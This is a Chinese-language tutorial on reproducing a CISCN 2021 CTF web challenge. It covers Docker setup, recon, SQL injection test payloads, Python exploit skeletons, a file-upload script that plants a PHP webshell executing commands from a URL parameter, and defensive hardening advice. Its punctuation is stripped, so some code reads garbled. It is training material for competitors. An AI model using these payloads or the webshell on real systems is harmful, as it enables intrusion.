CISCN 2021 Web赛题深度复现从环境搭建到漏洞利用实战指南在网络安全竞赛领域CISCN全国大学生信息安全竞赛一直被视为国内最具挑战性的赛事之一。2021年的Web赛题尤其值得深入研究它不仅考察了基础的漏洞利用技巧还融入了当时最新的攻防对抗思路。本文将带你从零开始完整复现这道赛题包括Docker环境配置、漏洞原理分析以及自动化利用脚本开发为备赛学生和安全研究者提供一套可落地的实战方案。1. 实验环境搭建与配置复现任何安全漏洞的第一步都是搭建一个与原始比赛尽可能一致的环境。对于2021年CISCN Web赛题我们推荐使用Docker进行环境隔离这不仅能保证实验的可重复性也能避免对主机系统造成意外影响。1.1 Docker环境准备首先确保你的系统已经安装了Docker和Docker Compose。以下是基础环境检查命令# 检查Docker版本 docker --version # 检查Docker Compose版本 docker-compose --version如果尚未安装可以参考以下快速安装步骤以Ubuntu为例# 更新软件包索引 sudo apt-get update # 安装必要依赖 sudo apt-get install apt-transport-https ca-certificates curl software-properties-common # 添加Docker官方GPG密钥 curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - # 添加Docker仓库 sudo add-apt-repository deb [archamd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable # 再次更新并安装Docker CE sudo apt-get update sudo apt-get install docker-ce # 验证安装 sudo docker run hello-world1.2 赛题环境部署根据对2021年CISCN Web赛题的分析我们需要准备以下组件Web服务器Nginx/Apache特定版本的PHP环境可能存在漏洞的第三方库或框架数据库MySQL/SQLite创建一个docker-compose.yml文件来定义整个环境version: 3 services: web: image: php:7.4-apache ports: - 8080:80 volumes: - ./web:/var/www/html depends_on: - db db: image: mysql:5.7 environment: MYSQL_ROOT_PASSWORD: ciscn2021 MYSQL_DATABASE: vuln_app MYSQL_USER: app_user MYSQL_PASSWORD: app_pass volumes: - ./mysql:/var/lib/mysql这个配置使用了PHP 7.4与Apache的组合以及MySQL 5.7作为数据库。将赛题提供的源代码放入web目录然后运行docker-compose up -d环境启动后访问http://localhost:8080应该能看到赛题的初始界面。注意实际赛题可能使用了不同的技术栈这里只是示例配置。真正的复现需要根据原始赛题的具体技术要求调整Docker配置。2. 赛题分析与漏洞定位2021年CISCN Web赛题的核心漏洞通常集中在以下几个常见类型SQL注入特别是盲注或基于时间的注入文件操作漏洞包括文件包含、文件上传、目录遍历等反序列化漏洞PHP或其他语言的反序列化问题逻辑漏洞业务流中的设计缺陷SSRF/XXE服务器端请求伪造或XML外部实体注入2.1 初步信息收集首先对Web应用进行基础信息收集# 使用curl获取HTTP头信息 curl -I http://localhost:8080 # 使用nikto进行基础扫描 docker run --network host -it sullo/nikto -h http://localhost:8080 # 使用dirsearch进行目录扫描 docker run --network host -it secsi/dirsearch -u http://localhost:8080 -e php根据历史Writeup2021年赛题的关键入口点可能包括/index.php?pagelogin/api/v1/userinfo/upload.php/admin/backup2.2 代码审计技巧对于提供的PHP源代码重点关注以下高危函数函数类别示例函数潜在风险数据库操作mysql_query, mysqli_query, PDO::querySQL注入文件操作include, require, file_get_contents文件包含/LFI命令执行system, exec, passthruRCE反序列化unserialize对象注入文件上传move_uploaded_file上传漏洞一个典型的漏洞代码模式可能如下// 不安全的SQL查询 $id $_GET[id]; $sql SELECT * FROM users WHERE id $id; $result mysql_query($sql); // 不安全的文件包含 $page $_GET[page]; include($page . .php);2.3 漏洞验证POC假设我们发现了一个疑似SQL注入的点/user.php?id1可以尝试以下验证步骤基础注入测试/user.php?id1 /user.php?id1 and 11 /user.php?id1 and 12如果存在注入尝试获取基本信息/user.php?id1 order by 5 /user.php?id-1 union select 1,2,3,4,5提取数据库信息/user.php?id-1 union select 1,database(),user(),version(),53. 漏洞利用与自动化脚本开发手动验证漏洞后我们可以开发自动化脚本来提高效率并实现更复杂的利用。Python是这类任务的首选语言因为它有丰富的网络和安全相关库。3.1 基于Python的SQL注入利用以下是一个基础的SQL注入利用脚本框架import requests import urllib.parse TARGET_URL http://localhost:8080/user.php def check_vulnerable(): payload 1 and 11 r requests.get(TARGET_URL, params{id: payload}) if 正常内容 in r.text: return True return False def exploit_boolean_blind(): # 实现布尔盲注逻辑 pass def exploit_time_based(): # 实现基于时间的盲注逻辑 pass if __name__ __main__: if check_vulnerable(): print([] 目标存在SQL注入漏洞) # 根据实际情况选择利用方式 else: print([-] 未发现SQL注入漏洞)3.2 文件上传漏洞利用如果发现文件上传功能可以利用以下方法绕过前端验证修改HTTP请求直接发送恶意文件绕过MIME类型检查修改Content-Type头绕过扩展名检查尝试.php5, .phtml等变种利用解析差异如Apache的多扩展名解析一个文件上传利用脚本示例import requests import os UPLOAD_URL http://localhost:8080/upload.php WEBSHELL ?php system($_GET[cmd]); ? files { file: (shell.php, WEBSHELL, image/jpeg) } response requests.post(UPLOAD_URL, filesfiles) if 上传成功 in response.text: print([] Webshell上传成功) # 确认webshell位置并测试 shell_url http://localhost:8080/uploads/shell.php r requests.get(shell_url, params{cmd: id}) print(r.text) else: print([-] 上传失败) print(response.text)3.3 综合利用框架对于复杂漏洞链可以设计一个更完整的利用框架class CISCN2021Exploit: def __init__(self, target): self.target target self.session requests.Session() def sql_injection(self): # 实现SQL注入利用 pass def file_upload(self): # 实现文件上传利用 pass def rce(self, cmd): # 实现命令执行 pass def get_flag(self): # 自动化获取flag pass if __name__ __main__: exploit CISCN2021Exploit(http://localhost:8080) exploit.sql_injection() exploit.file_upload() print(exploit.rce(id)) print(exploit.get_flag())4. 防御措施与安全加固在复现漏洞后了解如何防御同样重要。以下是针对发现漏洞的加固建议4.1 SQL注入防御使用预处理语句$stmt $pdo-prepare(SELECT * FROM users WHERE id ?); $stmt-execute([$id]); $user $stmt-fetch();最小权限原则数据库用户只赋予必要权限输入验证对输入进行严格类型和格式检查Web应用防火墙部署WAF拦截常见攻击模式4.2 文件操作安全禁用危险函数在php.ini中设置disable_functions exec,system,passthru...限制文件包含路径$allowed [home.php, about.php]; if(in_array($page, $allowed)) { include($page . .php); }安全文件上传验证文件类型检查MIME类型和扩展名随机化文件名存储上传文件在非Web可访问目录设置文件权限为只读4.3 安全开发实践使用现代框架如Laravel、Symfony等内置安全机制持续更新依赖定期更新第三方库和组件安全代码审查建立代码审计流程渗透测试定期进行安全测试5. 竞赛技巧与经验分享参加CTF比赛不仅需要技术知识还需要策略和效率。以下是一些实战经验时间管理先解决简单题目获取基础分团队分工根据成员专长分配Web、Pwn、Crypto等方向工具准备常用工具Docker化便于快速部署准备常用Payload和字典开发自动化脚本处理重复任务信息收集详细记录每一步发现善用搜索引擎和过往Writeup注意题目描述和源码中的提示在真实比赛中2021年这道Web题目的突破点往往在于发现开发者留下的非预期解。例如备份文件泄露.bak, .swp文件注释中的敏感信息配置错误导致的目录列表默认凭据或弱密码复现这类赛题最大的价值不在于简单地获取flag而在于理解漏洞产生的根本原因和开发者的思维盲点。通过搭建完整环境、分析漏洞原理、开发利用工具这一完整流程你不仅能提升竞赛能力也能增强实际工作中的安全防护意识。